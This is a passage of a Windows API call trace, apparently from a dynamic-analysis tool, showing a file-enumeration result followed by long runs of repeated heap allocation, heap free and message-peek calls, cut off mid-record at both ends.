lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa390ac40, ftCreationTime.dwHighDateTime=0x1d89fc9, ftLastAccessTime.dwLowDateTime=0x6b2e7f20, ftLastAccessTime.dwHighDateTime=0x1d8a2d6, ftLastWriteTime.dwLowDateTime=0x6b2e7f20, ftLastWriteTime.dwHighDateTime=0x1d8a2d6, nFileSizeHigh=0x0, nFileSizeLow=0xdb59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WdFQwzg9SEi1QiIC.mkv", cAlternateFileName="WDFQWZ~1.MKV")) returned 0 [0197.617] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0197.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0197.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0197.618] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0197.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47a88 [0197.618] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0197.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0197.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0197.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.661] HeapFree 